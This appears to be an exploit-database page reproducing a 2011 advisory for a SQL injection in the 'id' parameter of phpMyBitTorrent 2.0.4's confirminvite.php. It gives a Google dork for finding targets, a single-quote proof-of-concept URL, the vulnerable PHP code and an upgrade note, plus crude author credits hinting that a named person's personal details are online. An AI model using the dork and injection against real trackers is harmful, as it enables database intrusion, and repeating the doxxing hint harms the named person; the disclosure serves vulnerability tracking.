header-logo
Suggest Exploit
vendor:
phpMyBitTorrent
by:
#forkbombers@irc.smashthestack.org
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpMyBitTorrent
Affected Version From: 2.0.4
Affected Version To: 2.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpmybittorrent:phpmybittorrent:2.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: *nix
2011

phpMyBitTorrent 2.0.4 SQL injection

The vulnerability exists in phpMyBitTorrent 2.0.4, which is an open source web-based BitTorrent tracker written in PHP and using a MySQL database. The vulnerability allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'confirminvite.php' script. The attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of phpMyBitTorrent.
Source

Exploit-DB raw data:

# Exploit Title: phpMyBitTorrent 2.0.4 SQL injection
# Google Dork: inurl:"user.php?op=register"
# Date: 14/FEB/2011
# Author: #forkbombers@irc.smashthestack.org
# Software Link: http://sourceforge.net/projects/phpmybittorrent/
# Version: 2.0.4
# Tested on: *nix

----------------------------------------------------------------------
			[INFO]

Sadly although the Google dork returns 36,000 results for this to work the invitation
system needs to be enabled for this exploit to work. Fucking useless to me.

----------------------------------------------------------------------
			[XPL]

localhost/torrents/confirminvite.php?id=1'

Error Executing SQL Query SELECT password, active FROM torrent_users WHERE id =

----------------------------------------------------------------------
			[CODE]
[code]
$sql = "SELECT password, active FROM ".$db_prefix."_users WHERE id = $id";
$res = $db->sql_query($sql) or btsqlerror($sql);
$row = $db->sql_fetchrow($res);

if (!$row)
bterror(_bterrusernotexists,_btsorry);

if ($row["active"] != '0') {
OpenTable(_btsignup);
echo "<p>"._btuseralreadyactive."</p>";
CloseTable();
include('footer.php')
[/code]

----------------------------------------------------------------------
			[CREDS]

Thanks to Gumbie@irc.efnet.org for letting me use his box to test :)
Fuck ak for being such a bitch (not really <3 u), btw his d0x are g00gleiz3d if you want to give him a call

----------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR